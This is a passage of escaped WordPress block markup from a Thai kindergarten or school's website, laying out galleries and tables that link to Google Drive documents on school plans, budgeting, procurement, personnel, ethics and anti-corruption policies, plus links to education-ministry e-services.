src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"ids\":[260],\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":757,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1-1024x538.jpg\" alt=\"\" class=\"wp-image-757\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 